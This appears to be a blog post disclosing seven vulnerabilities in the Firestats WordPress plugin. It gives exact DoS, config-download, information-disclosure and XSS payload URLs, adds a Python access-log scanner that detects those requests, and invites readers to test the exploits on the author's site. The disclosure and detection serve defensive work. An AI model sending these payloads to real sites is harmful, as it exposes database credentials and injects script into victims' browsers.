I just tried to find more security leaks in the Firestats plugin; I was specifically searching for remotely exploitable problems.

The results are 7 fresh security issues.

1x DoS:

/wp-content/plugins/firestats/bridge.php?file_id=reset_password&show=1

1x remotely downloadable configuration file; this may contain the database information (username, password, name, prefix, host).

/wp-content/plugins/firestats/php/tools/get_config.php

2x Information disclosure:

/wp-content/plugins/firestats/php/page-sites.php
/wp-content/plugins/firestats/php/page-tools.php

3x XSS:

/wp-content/plugins/firestats/php/window-add-excluded-ip.php?edit=%3Cscript%3Ealert%28123%29%3C/script%3E
/wp-content/plugins/firestats/php/window-add-excluded-url.php?edit=%3Cscript%3Ealert%28123%29%3C/script%3E
/wp-content/plugins/firestats/php/window-new-edit-site.php?site_id=%27%20onmousemove=alert%28123%29;%20style=width:900;height:900;%20a=
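As an added example (not code from the post or from the Firestats project), here is a small Python check a site owner can run over their web-server access log to see whether anyone has already hit the endpoints listed above. It assumes Apache combined log format; the sample log lines below are constructed.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2009:12:00:01 +0000] "GET /wp-content/plugins/firestats/php/window-add-excluded-ip.php?edit=%3Cscript%3Ealert%28123%29%3C/script%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Jan/2009:12:00:02 +0000] "GET /wp-content/plugins/firestats/php/tools/get_config.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jan/2009:12:00:03 +0000] "GET /wp-content/plugins/firestats/bridge.php?file_id=reset_password&show=1 HTTP/1.1" 200 64 "-" "curl/7.19"
198.51.100.7 - - [10/Jan/2009:12:00:04 +0000] "GET /wp-content/plugins/firestats/php/window-new-edit-site.php?site_id=%27%20onmousemove=alert%28123%29;%20a= HTTP/1.1" 200 700 "-" "curl/7.19"
192.0.2.9 - - [10/Jan/2009:12:00:05 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Jan/2009:12:00:06 +0000] "GET /wp-content/plugins/firestats/php/window-add-excluded-ip.php?edit=10.0.0.1 HTTP/1.1" 200 400 "-" "Mozilla/5.0"
"""

# Parses client IP, request target and status from a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

PLUGIN = "/wp-content/plugins/firestats"
CONFIG_PATH = PLUGIN + "/php/tools/get_config.php"   # any hit is worth knowing about
BRIDGE_PATH = PLUGIN + "/bridge.php"                  # flagged only with the DoS parameters
XSS_PATHS = {                                         # flagged only when a parameter carries markup
    PLUGIN + "/php/window-add-excluded-ip.php",
    PLUGIN + "/php/window-add-excluded-url.php",
    PLUGIN + "/php/window-new-edit-site.php",
}
# Crude markup/event-handler detector applied to the URL-decoded query string.
MARKUP_RE = re.compile(r"<\s*\w|\bon\w+\s*=|javascript:", re.IGNORECASE)


def classify(line):
    """Return (ip, finding, path) for a suspicious request, or None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    query = unquote(query)
    if path == CONFIG_PATH:
        return (m.group("ip"), "config file download", path)
    if path == BRIDGE_PATH and "file_id=reset_password" in query:
        return (m.group("ip"), "DoS request", path)
    if path in XSS_PATHS and MARKUP_RE.search(query):
        return (m.group("ip"), "XSS probe", path)
    return None


def scan(log_text):
    """Scan a whole log and return the list of suspicious hits in order."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for ip, finding, path in scan(SAMPLE_LOG):
        print(f"{ip}\t{finding}\t{path}")
```

Legitimate use of the excluded-IP page (the last sample line) is not flagged because its parameter carries no markup.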

Let’s hope they patch soon, because we are running Firestats too. The previous fix came very fast, so I assume they will fix it fast this time too.
Oh and feel free to test the exploits against this site (but don’t try out the DoS please).

Good luck Firestats team with fixing these vulnerabilities!